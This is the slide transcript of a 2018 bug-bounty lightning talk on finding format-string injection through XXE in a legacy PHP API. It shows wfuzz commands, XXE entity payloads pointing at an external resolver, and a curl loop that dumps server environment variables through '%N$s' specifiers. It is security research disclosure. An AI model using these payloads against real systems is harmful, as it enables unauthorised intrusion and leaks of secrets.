Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Web based format injection, dumping memory like...

Avatar for Frans Rosén Frans Rosén
September 19, 2018
Research
0
150

Web based format injection, dumping memory like it's 99 (or "Please help")

My lightning talk from Sec-T Stockholm in September 2018.

Avatar for Frans Rosén

Frans Rosén

September 19, 2018
Tweet

More Decks by Frans Rosén

See All by Frans Rosén
X-Correlation Injections (or How to break server-side contexts)
Avatar for Frans Rosén fransrosen
0
1.6k
Story of a RCE on Apple through hot jar swapping
Avatar for Frans Rosén fransrosen
0
1.2k
Account hijacking using "dirty dancing" in sign-in OAuth-flows
Avatar for Frans Rosén fransrosen
0
300
A methodology using fuzzing and info disclosure
Avatar for Frans Rosén fransrosen
0
380
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Avatar for Frans Rosén fransrosen
3
9.4k
A story of the passive aggressive sysadmin of AEM
Avatar for Frans Rosén fransrosen
0
8.4k
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
Avatar for Frans Rosén fransrosen
3
7.4k

Other Decks in Research

See All in Research
Language Models Are Implicitly Continuous
Avatar for Sho Yokoi eumesy
PRO
0
280
Learning to (Learn at Test Time): RNNs with Expressive Hidden States
Avatar for Hiroto Kurita kurita
1
230
心理言語学の視点から再考する言語モデルの学習過程
Avatar for Masato Mita chemical_tree
2
610
cvpaper.challenge 10年の軌跡 / cvpaper.challenge a decade-long journey
Avatar for gatheluck gatheluck
3
340
EcoWikiRS: Learning Ecological Representation of Satellite Images from Weak Supervision with Species Observation and Wikipedia
Avatar for SatAI.challenge satai
3
230
診断前の病歴テキストを対象としたLLMによるエンティティリンキング精度検証
Avatar for Takashi Nishibayashi hagino3000
1
150
[CV勉強会@関東 CVPR2025] VLM自動運転model S4-Driver
Avatar for Shin-kyoto shinkyoto
2
510
生成的推薦の人気バイアスの分析:暗記の観点から / JSAI2025
Avatar for Shotaro Ishihara upura
0
280
Large Language Model Agent: A Survey on Methodology, Applications and Challenges
Avatar for Shunsuke KITADA shunk031
17
10k
多言語カスタマーインタビューの“壁”を越える~PMと生成AIの共創~ 株式会社ジグザグ 松野 亘
Avatar for Wataru Matsuno watarumatsuno
0
130
J-RAGBench: 日本語RAGにおける Generator評価ベンチマークの構築
Avatar for Koki Itai koki_itai
0
560
Google Agent Development Kit (ADK) 入門 🚀
Avatar for MIKIO KUBO mickey_kubo
2
1.9k

Featured

See All Featured
Become a Pro
Avatar for Speaker Deck speakerdeck
PRO
29
5.5k
Understanding Cognitive Biases in Performance Measurement
Avatar for Philip Tellis bluesmoon
29
2.6k
10 Git Anti Patterns You Should be Aware of
Avatar for Lemi Orhan Ergin lemiorhan
PRO
657
61k
Chrome DevTools: State of the Union 2024 - Debugging React & Beyond
Avatar for Addy Osmani addyosmani
7
890
Building a Modern Day 
E-commerce SEO Strategy
Avatar for Aleyda Solis aleyda
43
7.7k
Sharpening the Axe: The Primacy of Toolmaking
Avatar for Bryan Cantrill bcantrill
45
2.5k
Docker and Python
Avatar for Tania Allard trallard
46
3.6k
Building an army of robots
Avatar for Kyle Neath kneath
306
46k
CoffeeScript is Beautiful & I Never Want to Write Plain JavaScript Again
Avatar for Sam Stephenson sstephenson
162
15k
The Web Performance Landscape in 2024 [PerfNow 2024]
Avatar for Tammy Everts tammyeverts
9
850
Navigating Team Friction
Avatar for Lara Hogan lara
189
15k
Agile that works and the tools we love
Avatar for Rasmus Luckow-Nielsen rasmusluckow
331
21k

Transcript

  1. @fransrosen Web based format injection, dumping memory like it's 99

    or "Please help"

  2. @fransrosen Public Bug Bounty

  3. @fransrosen RCE is 30,000 USD

  4. @fransrosen Methodology • Found a domain not like the other

    ones

  5. @fransrosen Methodology • Found a domain not like the other

    ones • Legacy on-premise PHP-app acquired by a huge tech organization

  6. @fransrosen Methodology • Found a domain not like the other

    ones • Legacy on-premise PHP-app acquired by a huge tech organization • Old API-endpoints still available

  7. @fransrosen Methodology • Found a domain not like the other

    ones • Legacy on-premise PHP-app acquired by a huge tech organization • Old API-endpoints still available 👍 👍 👍

  8. @fransrosen Methodology • Google + GitHub etc

  9. @fransrosen Methodology • Google + GitHub etc

  10. @fransrosen Methodology • Google + GitHub etc

  11. @fransrosen Methodology • Google + GitHub etc

  12. @fransrosen Methodology • Google + GitHub etc • wfuzz!

  13. @fransrosen Methodology • Google + GitHub etc • wfuzz! Interesting

    path: /cgi-bin/default/

  14. @fransrosen Methodology • Google + GitHub etc • wfuzz! python

    wfuzz/src/wfuzz-cli.py -Z -w w.txt -c \
 -H "User-Agent: Mozilla.." \ "https://www.techsite.com/cgi-bin/default/FUZZ

  15. @fransrosen Methodology • Google + GitHub etc • wfuzz!

  16. @fransrosen Methodology • Google + GitHub etc • wfuzz! /cgi-bin/default/php/

  17. @fransrosen Methodology • Google + GitHub etc • wfuzz! python

    wfuzz/src/wfuzz-cli.py -Z -w w.txt -c \
 -H "User-Agent: Mozilla.." \ "https://www.techsite.com/cgi-bin/default/php/FUZZ

  18. @fransrosen Methodology • Google + GitHub etc • wfuzz!

  19. @fransrosen xml_api?

  20. @fransrosen xml_api?

  21. @fransrosen xml_api? YEAH! 👍

  22. @fransrosen wtf!?

  23. @fransrosen XXE!

  24. @fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver">

  25. @fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver">

  26. @fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver"> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  27. @fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver"> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  28. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "http://my-dns-resolver"> ]>

    <Envelope><Body><exec><transaction>&exl;</transaction>
 </exec></Body></Envelope>

  29. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "http://my-dns-resolver"> ]>

    <Envelope><Body><exec><transaction>&exl;</transaction>
 </exec></Body></Envelope>

  30. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY % exl SYSTEM "http://my-dns-resolver">%exl;

    ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  31. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY % exl SYSTEM "http://my-dns-resolver">%exl;

    ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  32. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY % exl SYSTEM "http://my-dns-resolver">%exl;

    ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope> ???

  33. @fransrosen

  34. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxxåäö"> ]>

    <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  35. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxxåäö"> ]>

    <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  36. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>

    <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  37. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>

    <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  38. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>

    <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope> WOAH.

  39. @fransrosen Format String Injection?

  40. @fransrosen Format String Injection ON ZE WEB?

  41. @fransrosen Format String Injection http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf

  42. @fransrosen Format String Injection <!DOCTYPE root [ <!ENTITY exl SYSTEM

    "%x %x %s" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  43. @fransrosen Format String Injection <!DOCTYPE root [ <!ENTITY exl SYSTEM

    "%x %x %s" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  44. @fransrosen I can’t handle this shit

  45. @fransrosen Help me, zetatwo

  46. @fransrosen Help me, zetatwo

  47. @fransrosen Help me, zetatwo

  48. @fransrosen zetatwo: latin1! <?xml version="1.0" encoding="latin1"?> <!DOCTYPE root [ <!ENTITY

    exl SYSTEM "åäö" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  49. @fransrosen zetatwo: latin1! <?xml version="1.0" encoding="latin1"?> <!DOCTYPE root [ <!ENTITY

    exl SYSTEM "åäö" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  50. @fransrosen Limitations 0x20-0xFF (no 0x22)

  51. @fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff

  52. @fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff

  53. @fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff

  54. @fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff

  55. @fransrosen We can read all ENVs for i in $(seq

    8460 8550); do res=$(curl -s -X POST -H 'Content-Type: text/xml; charset="UTF-8"' \—data-binary \ ’<?xml version="1.0" encoding="utf-8"?>
 <!DOCTYPE x [ <!ENTITY ba SYSTEM " %'${i}'$s "> ]>
 <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>'

  56. @fransrosen We can read all ENVs for i in $(seq

    8460 8550); do res=$(curl -s -X POST -H 'Content-Type: text/xml; charset="UTF-8"' \—data-binary \ ’<?xml version="1.0" encoding="utf-8"?>
 <!DOCTYPE x [ <!ENTITY ba SYSTEM " %'${i}'$s "> ]>
 <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>'

  57. @fransrosen Response "We are unable to see anything sensitive in

    the response. If you believe you have found sensitive information please provide this to us."

  58. @fransrosen Response "We are unable to see anything sensitive in

    the response. If you believe you have found sensitive information please provide this to us."

  59. @fransrosen Response "We are unable to see anything sensitive in

    the response. If you believe you have found sensitive information please provide this to us."

  60. @fransrosen Want to collaborate? @fransrosen

  61. @fransrosen Questions? Suggestions?